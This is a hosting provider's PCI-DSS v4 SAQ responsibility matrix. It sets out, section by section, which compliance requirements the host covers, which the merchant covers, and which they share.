PCI-DSS SAQ & Responsibility Matrix
Table of Contents
PCI Compliance is a merchants responsibility. Some questions within your SAQ relate to infrastructure/server configuration, for which you can find the scope and appropriate answer below.
Physical Architecture

SAQ Answers (Updated for v4)
Section | Scope | Response | Condition |
---|---|---|---|
1.1.1 - 1.5.1 | Sonassi | Yes | |
2.1.1 - 2.2.7 | Sonassi | Yes | |
2.3.1 - 2.3.2 | Sonassi | N/A | |
3.1.1 - 3.7.9 | You | Yes | If using Magento Payment Bridge or 3rd Party for cardholder data storage. N/A if not using Magento Payment Bridge when storing cardholder data |
4.1.1 - 4.2.2 | You | Yes/No | If using HTTPS. No if not using HTTPS |
5.1.1 - 5.4.1 | Sonassi | Yes | |
6.1.1 - 6.1.2 | Sonassi | Yes | |
6.2.1 - 6.2.4 | You | This depends on your own development practice | |
6.3.1 - 6.3.3 | Both | Sonassi is responsible for patching the operating system and services. You are responsible for patching any software you install, such as Magento or Node. | |
6.4.1 - 6.5.1 | You | This depends on your own development practice | |
6.5.2 - 6.5.2 | Sonassi | Yes | |
6.5.3 - 6.5.3 | You | Yes | If using separate domain groups for your stores |
6.5.4 - 6.5.6 | You | This depends on your own development practice | |
7.1.1 - 7.3.3 | Both | Sonassi manages access to the stack platform, whereas you manage access to your Magento store and any other CMS platforms (e.g. WordPress) | |
8.1.1 - 8.6.3 | Both | Yes | Provided you comply with the conditions that apply to you |
9.1.1 - 9.3.9 | Sonassi | Yes | |
9.4.7 - 9.5.1.3 | You | This depends on your own cardholder data processing practice | |
10.1.1 - 10.4.3 | Sonassi | Yes | |
10.5.1 - 10.5.1 | Sonassi | Yes | If using our long term log storage facility |
10.6.1 - 10.7.3 | Sonassi | Yes | |
11.1.1 - 11.1.2 | Sonassi | Yes | |
11.2.1 - 11.2.2 | Sonassi | N/A | |
11.3.1 - 11.4.6 | Sonassi | Yes | |
11.4.7 - 11.4.7 | Sonassi | N/A | |
11.5.1 - 11.5.1.1 | Sonassi | Yes | Per our standard firewall policy |
11.5.2 - 11.5.2 | Sonassi | Yes | Per our vulnerability scanner and our audit log notifier |
11.6.1 - 11.6.1 | You | Magento covers this with CSP and SRI configuration. Third parties such as Threatview also cover this | |
12.1.1 - 12.8.1 | Both | Yes | Yes for Sonassi, but also depends on your own security |
12.8.2 - 12.9.2 | You | This depends on your own cardholder data storage practice | |
12.10.1 - 12.10.7 | Both | Yes | Depending on your own incident response plan |